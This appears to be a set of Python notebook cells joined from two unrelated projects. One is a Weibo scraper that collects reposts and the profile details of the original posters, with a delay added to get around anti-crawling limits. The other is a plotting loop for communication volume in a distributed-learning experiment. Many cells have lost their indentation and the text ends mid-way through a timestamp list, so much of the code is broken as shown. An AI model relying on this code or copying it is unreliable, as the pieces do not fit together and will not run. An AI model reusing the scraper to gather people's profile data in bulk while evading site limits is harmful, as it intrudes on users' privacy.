## Utility class that strips unwanted links, tags, etc. from the scraped text
```
#Utility class that strips unwanted links, tags, etc. from the scraped text
class Tool:
deleteImg = re.compile('<img.*?>')
newLine =re.compile('<tr>|<div>|</tr>|</div>')
deleteAite = re.compile('//.*?:')
deleteAddr = re.compile('<a.*?>.*?</a>|<a href='+'\'https:')
deleteTag = re.compile('<.*?>')
deleteWord = re.compile('回复@|回覆@|回覆|回复')
@classmethod
def replace(cls,x):
x = re.sub(cls.deleteWord,'',x)
x = re.sub(cls.deleteImg,'',x)
x = re.sub(cls.deleteAite,'',x)
x = re.sub(cls.deleteAddr, '', x)
x = re.sub(cls.newLine,'',x)
x = re.sub(cls.deleteTag,'',x)
return x.strip()
```
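A small usage example (the class is repeated here so the snippet is self-contained; the sample string is illustrative, not taken from real scraped data):

```python
import re

class Tool:
    deleteImg = re.compile('<img.*?>')
    newLine = re.compile('<tr>|<div>|</tr>|</div>')
    deleteAite = re.compile('//.*?:')
    deleteAddr = re.compile('<a.*?>.*?</a>|<a href=' + '\'https:')
    deleteTag = re.compile('<.*?>')
    deleteWord = re.compile('回复@|回覆@|回覆|回复')

    @classmethod
    def replace(cls, x):
        # apply the substitutions in order: reply markers, images, @-mentions,
        # links, layout tags, then any remaining tags
        x = re.sub(cls.deleteWord, '', x)
        x = re.sub(cls.deleteImg, '', x)
        x = re.sub(cls.deleteAite, '', x)
        x = re.sub(cls.deleteAddr, '', x)
        x = re.sub(cls.newLine, '', x)
        x = re.sub(cls.deleteTag, '', x)
        return x.strip()

raw = '回复@abc:hello<img src="x.png">world<div>'
print(Tool.replace(raw))  # abc:helloworld
```

The reply marker, image tag and `<div>` are removed, leaving only the text.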
### Build the urls for a user's Weibo posts
```
###All Weibo posts of a given account
def contentURL(id,pages):
i=0
urls=[]
for page in pages:
        if page != 0:
urls+=['https://m.weibo.cn/api/container/getIndex?containerid=230413'+str(id)+'_-_WEIBO_SECOND_PROFILE_WEIBO&page_type=03&page='+str(page)]
return urls
#Convert a dict of information into the desired list of fields
def getInfoList(infoDict,rangeDict):
infoList=[]
for item in rangeDict:
if rangeDict.get(item) is True:
content=infoDict.get(item)
if content is not None:
                #Clean the Weibo post text
if item =='text':
if processText is True:
content=Tool.replace(content)
infoList.append(content)
else:
infoList.append(rangeDict['infoNoExist'])
return infoList
```
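The field-selection logic can be shown as a self-contained miniature (text cleaning omitted; the placeholder value comes from the dictionary's own `'infoNoExist'` entry, as above):

```python
def getInfoList(infoDict, rangeDict):
    # keep only fields flagged True, in rangeDict order; fill gaps with the placeholder
    infoList = []
    for item in rangeDict:
        if rangeDict.get(item) is True:
            content = infoDict.get(item)
            infoList.append(content if content is not None else rangeDict['infoNoExist'])
    return infoList

blogRange = {'created_at': True, 'text': True, 'reposts_count': True, 'infoNoExist': '未知'}
blog = {'created_at': '20分钟前', 'reposts_count': 1035}
print(getInfoList(blog, blogRange))  # ['20分钟前', '未知', 1035]
```

The missing `'text'` field is replaced by the placeholder, and the output order always follows `rangeDict`, so the rows line up with the headers from `getInfoTitle`.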
### Observe the influence on each reposted Weibo
```
###Operate on the prepared list of urls
###Filter out reposted Weibo posts and process them
def reRatio(urls,csvWriter):
notEnd= True
    retweetBlogTitle=getInfoTitle(blogRangeDict,'转发')#headers for the repost's post fields
    retweetUserTitle=getInfoTitle(userRangeDict,'转发')#headers for the reposter's user fields
    originBlogTitle=getInfoTitle(blogRangeDict,'原文')#headers for the original post's fields
    originUserTitle=getInfoTitle(userRangeDict,'原文')#headers for the original poster's user fields
    infoTitle=getInfoTitle(infoRangeDict,'')#headers for the original poster's profile fields
    #Write the table header row
    if getConcreteInfoList is True:
        csvWriter.writerow(retweetBlogTitle+retweetUserTitle+originBlogTitle+originUserTitle+infoTitle)
    else:
        csvWriter.writerow(retweetBlogTitle+retweetUserTitle+originBlogTitle+originUserTitle)
for url in urls:
response = requests.get(url,headers=headers)
resjson = json.loads(response.text)
cards=resjson['data']['cards']
#print(cards)
        #Stop once the final page is reached
if(len(cards)==1):
notEnd=False
break
        #Iterate over every Weibo post on this page
for card in cards:
try:
            #Repost post and poster information
retweetBlogInfoDict=card['mblog']
retweetUserInfoDict=retweetBlogInfoDict['user']
            #Keep only the posts that are reposts
try:
originBlogInfoDict=retweetBlogInfoDict['retweeted_status']
if originBlogInfoDict is not None:
                    #Original post and original poster information
originUserInfoDict=originBlogInfoDict['user']
retweetUserID=retweetUserInfoDict['id']
originUserID=originUserInfoDict['id']
                    ###If it is not a self-repost, process it
if(retweetUserID!=originUserID):
infoList=[]
                        #Repost post data
retweetBlogInfoList=getInfoList(retweetBlogInfoDict,blogRangeDict)
infoList+=retweetBlogInfoList
                        #Reposter user data
                        ##assumed already known
retweetUserInfoList=getInfoList(retweetUserInfoDict,userRangeDict)
infoList+=retweetUserInfoList
                        #Original post data
originBlogInfoList=getInfoList(originBlogInfoDict,blogRangeDict)
infoList+=originBlogInfoList
                        #Original poster user data
originUserInfoList=getInfoList(originUserInfoDict,userRangeDict)
infoList+=originUserInfoList
                        #originUserID is the ID of the original account
                        #profile information for this id can be collected here
if getConcreteInfoList is True:
infoDict=getInfo(isLogin,originUserID)
otherInfoList=getInfoList(infoDict,infoRangeDict)
infoList+=otherInfoList
#print(infoList)
                            #Save the data to csv
csvWriter.writerow(infoList)
                        #Keep tracking this poster's influence
#break
except:
pass
except:
pass
        #Delay to avoid anti-crawling measures
time.sleep(3)
return notEnd
```
### Extract information from a personal profile page
```
def drillInfo(txt):
keyInfo={}
try:
resjson = json.loads(txt)
infodata = resjson.get('data')
cards = infodata.get('cards')
for l in range(0,len(cards)):
temp = cards[l]
card_group = temp.get('card_group')
        #Determine the type of information obtained
for card in card_group:
            #Store the information into the dict
name=card.get('item_name')
if name is not None:
content=card.get('item_content')
keyInfo[name]=content
except:
pass
return keyInfo
```
### Build the url for accessing a profile page by id
```
def infoUrl(id):
url = "https://m.weibo.cn/api/container/getIndex?containerid=230283"+str(id)+"_-_INFO"
return url
```
## Crawl the personal information of a blogger by id
```
def getInfo(state,id):
address=addrRoot+'info/'+str(state)+'id'+str(id)+'.txt'
path=addrRoot+'info/'
if os.path.exists(path) is False:
os.makedirs(path)
try:
        #File already exists
if(os.path.exists(address)==True):
fp = open(address,'r',encoding='utf-16')
txt=fp.read()
info=drillInfo(txt)
fp.close()
else:
fp = open(address,'w+',encoding='utf-16')
url=infoUrl(id)
if state is True:
response = requests.get(url,headers=headers)
else:
response = requests.get(url)
txt=response.text
fp.write(response.text)
info=drillInfo(txt)
fp.close()
except:
info=-1
return info
```
```
def getExatInfo(item,state,id):
info=getInfo(state,id)
content=info.get(item)
if content is not None:
return content
else:
return infoNoExistStr
### Build access to the trending page
def downloadData(id):
tweeter=getExatInfo('昵称',2,int(id))
batch=0
    while(1):
        fileAddr=addrFile(tweeter,'batch'+str(batch))
        if os.path.exists(fileAddr) is True:
            print(fileAddr+' already exists, skipping collection')
        else:
            print('Writing to file: '+fileAddr)
            fp = open(fileAddr,'w+',newline='',encoding='utf-16')
            writer=csv.writer(fp)
            if reRatio(contentURL(id,range(20*batch,20*(batch+1))),writer) is False:
                fp.close()
                break
            fp.close()
            print('Batch '+str(batch)+' data recorded')
        batch+=1
```
```
id=input('Blogger id: ')
downloadData(id)
```
```
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import time
from IPython.display import clear_output
import ipywidgets as widgets
import os
plt.rcParams["figure.figsize"] = (16,8)
dirs = [d for d in os.listdir('.') if os.path.isdir(d)]
dirs = np.sort(dirs)
wFolder = widgets.Dropdown(
options=dict(zip(dirs,dirs)),
description='Experiment:',
)
display(wFolder)
experimentFolder = wFolder.value
nodesAmount = 0
dirs = [d for d in os.listdir(experimentFolder) if os.path.isdir(os.path.join(experimentFolder,d))]
for d in dirs:
if 'worker' in d:
nodesAmount += 1
print("Number of learners:", nodesAmount)
```
Coordinator files
```
communication = []
files = []
allFiles = [f for f in os.listdir(os.path.join(experimentFolder, "coordinator", "communication"))]
for file in allFiles:
files.append(open(os.path.join(experimentFolder, "coordinator","communication", file), "r"))
files
# coordinator log files
# NB: this indexing assumes os.listdir returned the sendModel, violations
# and registrations files in exactly this order
data_sendModel = files[0]
data_violations = files[1]
data_registrations = files[2]
```
## Plot
```
files = []
timestamps = []
for i in range(nodesAmount):
files.append(open(os.path.join(experimentFolder, "worker" + str(i), "losses.txt"), "r"))
timestamps.append([])
t = [0]
commonStep = 0
displayStep = 1
recordStep = 1
recordUnique = True
vlines_buffer = []
rlines_buffer = []
slines_buffer = []
message_size = 0
message_sizes = []
fig = plt.figure()
fig, ax = plt.subplots(1)
while 1:
for i in range(nodesAmount):
file = files[i]
where = file.tell()
line = file.readline()
if not line:
time.sleep(1)
file.seek(where)
else:
timestamps[i].append(float(line.split('\t')[0]))
currentStep = min([len(ts) for ts in timestamps]) #minimum not needed? just length of any list; because above always one timestamp gets inserted per worker
if currentStep > commonStep: #if everywhere has been written something
commonStep = currentStep
# get synchr timestamp
# MAYBE IT IS NOT NECESSARY TO CHECK ALL OF THE TIME STAMPS BUT JUST TAKE THOSE OF LAST WORKER...
# now need to find the largest timestamp; so first of all the worker with most of the time stamps and in there the largest
if sum(np.array([len(ts) for ts in timestamps])-max([len(ts) for ts in timestamps]))==0: #then all lengths are equal
#print("equal lengths")
#print(timestamps)
time_step = float(np.amax(timestamps))
#print("maximal time step: " + str(time_step))
else:
#print("")
#print("different lengths")
#print("")
min_length = min([len(ts) for ts in timestamps])
# cut lists until min length and take maximal time stamp
#print("min length: " + str(min_length))
#print([ts[:min_length] for ts in timestamps])
#print(timestamps)
#print([ts[:min_length] for ts in timestamps])
time_step = float(np.amax([ts[:min_length] for ts in timestamps]))
#print("maximal time step of cut list: "+ str(time_step))
# get data of registration and violation files up to this time step
#print("CHOSEN TIME STEP:" + str(time_step))
#check for registrations up to time_step
while True:
# check in buffer (if not empty)
while rlines_buffer != []: #as long as buffer is not empty
#print("checking this line in buffer", vlines_buffer[0])
if float(rlines_buffer[0][0].split("\t")[0]) <= time_step:
message_size = message_size + int(rlines_buffer[0][0].split("\t")[4])
#print("registration message from buffer added with ts " + str(float(rlines_buffer[0][0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
rlines_buffer.remove(rlines_buffer[0])
#print("buffer after deleting: ", vlines_buffer)
else: #if first element in buffer is too big then the others in the buffer as well as first elem is smallest
break
# read new lines
where = data_registrations.tell()
rline = data_registrations.readline()
if not rline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_registrations.seek(where)
break
else:
if float(rline.split("\t")[0]) <= time_step:
# here: index 4 = message size
message_size = message_size + int(rline.split("\t")[4])
#print("registration message added with ts " + str(float(rline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
rlines_buffer.append([rline])
break
#check for sendModels up to time_step
while True:
# check in buffer (if not empty)
while slines_buffer != []: #as long as buffer is not empty
if float(slines_buffer[0][0].split("\t")[0]) <= time_step:
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(slines_buffer[0][0].split("\t")[3])* slines_buffer[0][0].split("\t")[2].count(".")
#print("sendModel message from buffer added with ts " + str(float(slines_buffer[0][0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
slines_buffer.remove(slines_buffer[0])
else:
break
# read new lines
where = data_sendModel.tell()
sline = data_sendModel.readline()
if not sline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_sendModel.seek(where)
break
else:
if float(sline.split("\t")[0]) <= time_step:
# here: index 4 = message size
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline.split("\t")[3])* sline.split("\t")[2].count(".")
#print("sendModel message added with ts " + str(float(sline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
slines_buffer.append([sline])
break
#check for violations up to time_step
while True:
# check in buffer (if not empty)
#print("buffer", vlines_buffer)
while vlines_buffer != []: #as long as buffer is not empty
#print("checking this line in buffer", vlines_buffer[0])
if float(vlines_buffer[0][0].split("\t")[0]) <= time_step:
message_size = message_size + int(vlines_buffer[0][0].split("\t")[4])
#print("violation message from buffer added with ts " + str(float(vlines_buffer[0][0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
vlines_buffer.remove(vlines_buffer[0])
#print("buffer after deleting: ", vlines_buffer)
else: #if first element in buffer is too big then the others in the buffer as well as first elem is smallest
break
# read new lines
where = data_violations.tell()
vline = data_violations.readline()
if not vline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_violations.seek(where)
break
else:
if float(vline.split("\t")[0]) <= time_step:
# here: index 4 = message size
print(vline)
message_size = message_size + int(vline.split("\t")[4])
#print("violation message added with ts " + str(float(vline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
vlines_buffer.append([vline])
break
message_sizes.append(message_size)
#print("message_sizes: " + str(message_sizes))
if commonStep % displayStep == 0:
clear_output(wait=True)
#fig = plt.figure()
fig, ax = plt.subplots(1)
plt.plot(t, message_sizes, lw=4, label='cumulative communication', color='blue')
#plt.legend(loc='upper center')
plt.grid()
plt.xlim(0,260)
plt.ylim(0,3.5*1e9)
plt.tick_params(colors=(0,0,0,0))
plt.show()
t.append(t[-1] + 1)
if len(t) % recordStep == 0 and t != 0:
j = 0
if recordUnique:
extent = ax.get_window_extent().transformed(plt.gcf().dpi_scale_trans.inverted())
#gca().set_axis_off()
#plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0, hspace = 0, wspace = 0)
#plt.margins(0,0)
#plt.gca().xaxis.set_major_locator(matplotlib.ticker.NullLocator())
#plt.gca().yaxis.set_major_locator(matplotlib.ticker.NullLocator())
fig.savefig(os.path.join(experimentFolder, 'layout_cumulative_communication' + str(len(t)) + '.png'), dpi=100,bbox_inches=extent)
else:
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
j += 1
```
## Old: the buffer handling here was wrong. After a deletion, the new first element was never re-checked.
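The bug is the classic pitfall of removing elements from a list while iterating over it with `for`: after each `remove`, the remaining elements shift left, so the loop's internal index skips the element that moved into the vacated slot. A minimal reproduction:

```python
buffer = [1, 2, 3, 4]
drained = []
for item in buffer:       # buggy: mutating the list the loop iterates over
    drained.append(item)
    buffer.remove(item)
print(drained, buffer)    # [1, 3] [2, 4] -- every other element was skipped

# the corrected pattern (as in the newer Plot cell): keep re-checking the
# head of the list until it no longer qualifies
buffer2 = [1, 2, 3, 4]
drained2 = []
while buffer2:
    drained2.append(buffer2.pop(0))
print(drained2, buffer2)  # [1, 2, 3, 4] []
```

This is why the newer cell drains the buffers with a `while` loop that always examines `vlines_buffer[0]` rather than a `for` loop.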
```
files = []
timestamps = []
for i in range(nodesAmount):
files.append(open(os.path.join(experimentFolder, "worker" + str(i), "losses.txt"), "r"))
timestamps.append([])
t = [0]
commonStep = 0
displayStep = 5
recordStep = 1
recordUnique = True
vlines_buffer = []
rlines_buffer = []
slines_buffer = []
message_size = 0
message_sizes = []
fig = plt.figure()
while 1:
for i in range(nodesAmount):
file = files[i]
where = file.tell()
line = file.readline()
if not line:
time.sleep(1)
file.seek(where)
else:
timestamps[i].append(float(line.split('\t')[0]))
currentStep = min([len(ts) for ts in timestamps]) #minimum not needed? just length of any list; because above always one timestamp gets inserted per worker
if currentStep > commonStep: #if everywhere has been written something
commonStep = currentStep
# get synchr timestamp
# MAYBE IT IS NOT NECESSARY TO CHECK ALL OF THE TIME STAMPS BUT JUST TAKE THOSE OF LAST WORKER...
# now need to find the largest timestamp; so first of all the worker with most of the time stamps and in there the largest
if sum(np.array([len(ts) for ts in timestamps])-max([len(ts) for ts in timestamps]))==0: #then all lengths are equal
#print("equal lengths")
#print(timestamps)
time_step = float(np.amax(timestamps))
#print("maximal time step: " + str(time_step))
else:
print("")
print("different lengths")
print("")
min_length = min([len(ts) for ts in timestamps])
# cut lists until min length and take maximal time stamp
#print("min length: " + str(min_length))
#print([ts[:min_length] for ts in timestamps])
#print(timestamps)
#print([ts[:min_length] for ts in timestamps])
time_step = float(np.amax([ts[:min_length] for ts in timestamps]))
#print("maximal time step of cut list: "+ str(time_step))
# get data of registration and violation files up to this time step
print("CHOSEN TIME STEP:" + str(time_step))
#check for registrations up to time_step
while True:
# check in buffer (if not empty)
if rlines_buffer != []:
for rline in rlines_buffer:
if float(rline[0].split("\t")[0]) <= time_step:
message_size = message_size + int(rline[0].split("\t")[4])
#print("registration message from buffer added with ts " + str(float(rline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
rlines_buffer.remove(rline)
# read new lines
where = data_registrations.tell()
rline = data_registrations.readline()
if not rline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_registrations.seek(where)
break
else:
if float(rline.split("\t")[0]) <= time_step:
# here: index 4 = message size
message_size = message_size + int(rline.split("\t")[4])
#print("registration message added with ts " + str(float(rline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
rlines_buffer.append([rline])
break
#check for sendModels up to time_step
while True:
# check in buffer (if not empty)
if slines_buffer != []:
for sline in slines_buffer:
if float(sline[0].split("\t")[0]) <= time_step:
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline[0].split("\t")[3])* sline[0].split("\t")[2].count(".")
#print("sendModel message from buffer added with ts " + str(float(sline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
slines_buffer.remove(sline)
# read new lines
where = data_sendModel.tell()
sline = data_sendModel.readline()
if not sline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_sendModel.seek(where)
break
else:
if float(sline.split("\t")[0]) <= time_step:
# here: index 4 = message size
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline.split("\t")[3])* sline.split("\t")[2].count(".")
#print("sendModel message added with ts " + str(float(sline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
slines_buffer.append([sline])
break
        #check for violations up to time_step
        while True:
            # check in buffer (if not empty)
            print("buffer", vlines_buffer)
            while vlines_buffer != []:  # as long as the buffer is not empty
                print("checking this line in buffer", vlines_buffer[0])
                if float(vlines_buffer[0][0].split("\t")[0]) <= time_step:
                    message_size = message_size + int(vlines_buffer[0][0].split("\t")[4])
                    print("violation message from buffer added with ts " + str(float(vlines_buffer[0][0].split("\t")[0])))
                    print("message_size: " + str(message_size))
                    # delete message from buffer
                    vlines_buffer.pop(0)
                    print("buffer after deleting: ", vlines_buffer)
                else:
                    # the buffer is ordered by timestamp, so if the first element is already too new, the rest are too
                    break
            # read new lines
            where = data_violations.tell()
            vline = data_violations.readline()
            print("new line: ", vline)
            if not vline:  # could it be that I'm waiting here too long?
                #time.sleep(1)
                data_violations.seek(where)
                break
            else:
                if float(vline.split("\t")[0]) <= time_step:
                    # here: index 4 = message size
                    message_size = message_size + int(vline.split("\t")[4])
                    print("violation message added with ts " + str(float(vline.split("\t")[0])))
                    print("message_size: " + str(message_size))
                else:
                    vlines_buffer.append([vline])
                    break
        message_sizes.append(message_size)
        print("message_sizes: " + str(message_sizes))
        if commonStep % displayStep == 0:
            #clear_output(wait=True)
            fig = plt.figure()
            plt.plot(t, message_sizes, lw=2, label='cumulative communication', color='blue')
            plt.legend(loc='upper center')
            plt.grid()
            plt.show()
        t.append(t[-1] + 1)
        if len(t) % recordStep == 0 and t != 0:
            j = 0
            #if recordUnique:
                #fig.savefig(os.path.join(experimentFolder, 'cumulative_communication' + str(len(t)) + '.png'), dpi=100)
            #else:
                #fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
            j += 1
```
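All of the versions in this log rely on the same `tell()`/`seek()`/`readline()` idiom to tail files that another process is still appending to: remember the file position before reading, and if no complete line has arrived yet, rewind to that position and retry later. A minimal, self-contained sketch of just that idiom (the file name and contents below are made up for illustration):

```python
# Sketch of the tell()/seek() tailing pattern used in the loops above.
import os, tempfile

def read_complete_lines(f):
    """Yield only fully written lines; rewind on an empty or partial read."""
    while True:
        where = f.tell()
        line = f.readline()
        if not line or not line.endswith("\n"):
            f.seek(where)   # rewind so the next call retries from here
            return
        yield line.rstrip("\n")

# demo with a temp file standing in for e.g. losses.txt
path = os.path.join(tempfile.mkdtemp(), "losses.txt")
with open(path, "w") as w:
    w.write("1.0\t0.5\n2.0\t0.4\n3.0\t0.3")   # last line has no newline yet
with open(path) as r:
    got = list(read_complete_lines(r))
print(got)  # only the two complete lines
```

The `endswith("\n")` check additionally guards against consuming a line the writer has only half flushed, which the plain `if not line:` check in the loops above does not.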
## OLD
```
files = []
timestamps = []
for i in range(nodesAmount):
    files.append(open(os.path.join(experimentFolder, "worker" + str(i), "losses.txt"), "r"))
    timestamps.append([])
t = [0]
commonStep = 0
displayStep = 5
recordStep = 1
recordUnique = True
vlines_buffer = []
rlines_buffer = []
slines_buffer = []
message_size = 0
message_sizes = []
fig = plt.figure()
while 1:
    for i in range(nodesAmount):
        file = files[i]
        where = file.tell()
        line = file.readline()
        if not line:
            time.sleep(1)
            file.seek(where)
        else:
            timestamps[i].append(float(line.split('\t')[0]))
    currentStep = min([len(ts) for ts in timestamps])  # minimum not needed? just length of any list, because above one timestamp gets inserted per worker
    if currentStep > commonStep:  # if everywhere something has been written. Don't we wait above anyway such that everyone has something to plot?
        commonStep = currentStep
        if type(np.amax(timestamps)) == list:
            print("argmax" + str(np.amax(timestamps)))
            print("timestamps" + str(timestamps))
        time_step = float(np.amax(timestamps))
        # get data of registration and violation files up to this time step
        #print("CHOSEN TIME STEP:" + str(time_step))
        #check for registrations up to time_step
        while True:
            # check in buffer (if not empty)
            if rlines_buffer != []:
                for rline in rlines_buffer:
                    if float(rline[0].split("\t")[0]) < time_step:
                        message_size = message_size + int(rline[0].split("\t")[4])
                        #print("registration message from buffer added with ts " + str(float(rline[0].split("\t")[0])))
                        #print("message_size: " + str(message_size))
                        # delete message from buffer
                        rlines_buffer.remove(rline)
            # read new lines
            where = data_registrations.tell()
            rline = data_registrations.readline()
            if not rline:  # could it be that I'm waiting here too long?
                #time.sleep(1)
                data_registrations.seek(where)
                break
            else:
                if float(rline.split("\t")[0]) < time_step:
                    # here: index 4 = message size
                    message_size = message_size + int(rline.split("\t")[4])
                    #print("registration message added with ts " + str(float(rline.split("\t")[0])))
                    #print("message_size: " + str(message_size))
                else:
                    rlines_buffer.append([rline])
                    break
        #check for sendModels up to time_step
        while True:
            # check in buffer (if not empty)
            if slines_buffer != []:
                for sline in slines_buffer:
                    if float(sline[0].split("\t")[0]) < time_step:
                        # count number of points in this string, which coincides with the number of nodes receiving the model
                        message_size = message_size + int(sline[0].split("\t")[3]) * sline[0].split("\t")[2].count(".")
                        #print("sendModel message from buffer added with ts " + str(float(sline[0].split("\t")[0])))
                        #print("message_size: " + str(message_size))
                        # delete message from buffer
                        slines_buffer.remove(sline)
            # read new lines
            where = data_sendModel.tell()
            sline = data_sendModel.readline()
            if not sline:  # could it be that I'm waiting here too long?
                #time.sleep(1)
                data_sendModel.seek(where)
                break
            else:
                if float(sline.split("\t")[0]) < time_step:
                    # here: index 3 = message size
                    # count number of points in this string, which coincides with the number of nodes receiving the model
                    message_size = message_size + int(sline.split("\t")[3]) * sline.split("\t")[2].count(".")
                    #print("sendModel message added with ts " + str(float(sline.split("\t")[0])))
                    #print("message_size: " + str(message_size))
                else:
                    slines_buffer.append([sline])
                    break
        #check for violations up to time_step
        while True:
            # check in buffer (if not empty)
            if vlines_buffer != []:
                for vline in vlines_buffer:
                    if float(vline[0].split("\t")[0]) < time_step:
                        message_size = message_size + int(vline[0].split("\t")[4])
                        #print("violation message from buffer added with ts " + str(float(vline[0].split("\t")[0])))
                        #print("message_size: " + str(message_size))
                        # delete message from buffer
                        vlines_buffer.remove(vline)
            # read new lines
            where = data_violations.tell()
            vline = data_violations.readline()
            if not vline:  # could it be that I'm waiting here too long?
                #time.sleep(1)
                data_violations.seek(where)
                break
            else:
                if float(vline.split("\t")[0]) < time_step:
                    # here: index 4 = message size
                    message_size = message_size + int(vline.split("\t")[4])
                    #print("violation message added with ts " + str(float(vline.split("\t")[0])))
                    #print("message_size: " + str(message_size))
                else:
                    vlines_buffer.append([vline])
                    break
        message_sizes.append(message_size)
        #print("message_sizes: " + str(message_sizes))
        if commonStep % displayStep == 0:
            clear_output(wait=True)
            fig = plt.figure()
            plt.plot(t, message_sizes, lw=2, label='cumulative communication', color='blue')
            plt.legend(loc='upper center')
            plt.grid()
            plt.show()
        t.append(t[-1] + 1)
        if len(t) % recordStep == 0 and t != 0:
            j = 0
            if recordUnique:
                fig.savefig(os.path.join(experimentFolder, 'cumulative_communication' + str(len(t)) + '.png'), dpi=100)
            else:
                fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
            j += 1
ts = [[1539343806.652, 1539343812.847, 1539343819.346, 1539343825.397, 1539343831.715, 1539343837.967, 1539343844.19, 1539343850.423, 1539343856.422, 1539343863.308, 1539343869.481, 1539343875.663, 1539343882.009, 1539343888.307, 1539343894.505, 1539343901.488, 1539343907.72, 1539343913.827, 1539343920.114, 1539343926.423, 1539343932.638, 1539343938.873, 1539343945.885, 1539343952.147, 1539343958.442, 1539343964.822, 1539343971.053, 1539343977.184, 1539343983.303, 1539343989.544, 1539343995.69, 1539344001.867, 1539344007.992, 1539344014.123, 1539344028.389, 1539344029.341, 1539344033.626, 1539344039.913, 1539344046.111, 1539344052.302, 1539344058.663, 1539344064.805, 1539344070.965, 1539344077.201, 1539344083.482, 1539344089.662, 1539344095.908, 1539344102.257, 1539344108.387, 1539344114.703, 1539344120.914, 1539344127.106, 1539344133.268, 1539344139.434, 1539344145.614, 1539344152.012, 1539344158.125, 1539344164.437, 1539344170.915, 1539344177.116, 1539344183.136, 1539344189.207, 1539344195.278, 1539344201.424, 1539344207.704, 1539344213.885, 1539344220.115, 1539344226.34, 1539344232.602, 1539344238.755, 1539344245.066, 1539344251.171, 1539344257.414, 1539344263.577, 1539344269.74, 1539344275.996, 1539344282.205, 1539344288.433, 1539344294.664, 1539344300.851, 1539344306.976, 1539344313.168, 1539344319.228, 1539344325.412, 1539344331.612, 1539344337.799, 1539344344.087, 1539344350.344, 1539344356.635, 1539344362.875, 1539344369.176, 1539344375.356, 1539344381.63, 1539344387.763, 1539344394.126, 1539344400.333, 1539344406.515, 1539344412.625, 1539344418.836, 1539344425.013, 1539344431.124, 1539344437.392, 1539344443.627, 1539344450.049, 1539344456.154, 1539344462.299, 1539344468.676, 1539344474.73, 1539344480.79, 1539344487.203, 1539344493.393, 1539344499.667, 1539344506.033, 1539344512.226, 1539344518.561, 1539344524.825, 1539344530.905, 1539344536.967, 1539344543.049, 1539344549.218, 1539344555.348, 1539344561.624, 1539344567.85, 1539344574.047, 1539344580.119, 
1539344586.298, 1539344592.512, 1539344598.719, 1539344604.924, 1539344611.083, 1539344617.327, 1539344623.623, 1539344629.892, 1539344635.978, 1539344642.194, 1539344648.407, 1539344654.533, 1539344660.896, 1539344667.043, 1539344673.328, 1539344679.491, 1539344685.977, 1539344692.444, 1539344698.847, 1539344705.745, 1539344712.12, 1539344718.457, 1539344724.761], [1539343802.776, 1539343808.776, 1539343814.743, 1539343821.31, 1539343827.511, 1539343833.911, 1539343840.227, 1539343858.692, 1539343859.699, 1539343860.606, 1539343865.709, 1539343872.145, 1539343878.373, 1539343896.72, 1539343897.667, 1539343898.601, 1539343904.419, 1539343910.416, 1539343916.445, 1539343941.047, 1539343941.963, 1539343942.91, 1539343943.829, 1539343948.49, 1539343954.778, 1539343961.274, 1539343967.577, 1539343973.53, 1539343979.78, 1539344028.332, 1539344029.214, 1539344030.243, 1539344031.21, 1539344032.172, 1539344033.081, 1539344034.018, 1539344035.058, 1539344036.464, 1539344042.64, 1539344048.996, 1539344055.146, 1539344061.469, 1539344067.597, 1539344073.489, 1539344079.526, 1539344086.053, 1539344092.433, 1539344098.794, 1539344105.146, 1539344111.361, 1539344117.551, 1539344123.878, 1539344130.147, 1539344136.519, 1539344142.774, 1539344148.997, 1539344155.32, 1539344161.681, 1539344168.107, 1539344174.323, 1539344180.438, 1539344186.572, 1539344192.764, 1539344198.814, 1539344204.892, 1539344210.8, 1539344216.884, 1539344223.145, 1539344229.432, 1539344235.76, 1539344242.043, 1539344248.224, 1539344254.191, 1539344260.567, 1539344266.705, 1539344272.663, 1539344278.879, 1539344285.21, 1539344291.466, 1539344297.713, 1539344303.912, 1539344310.155, 1539344316.099, 1539344322.271, 1539344328.374, 1539344334.571, 1539344340.724, 1539344346.879, 1539344352.859, 1539344359.317, 1539344365.683, 1539344371.813, 1539344377.99, 1539344384.034, 1539344390.232, 1539344396.609, 1539344402.958, 1539344409.166, 1539344415.388, 1539344421.57, 1539344427.814, 1539344433.956, 
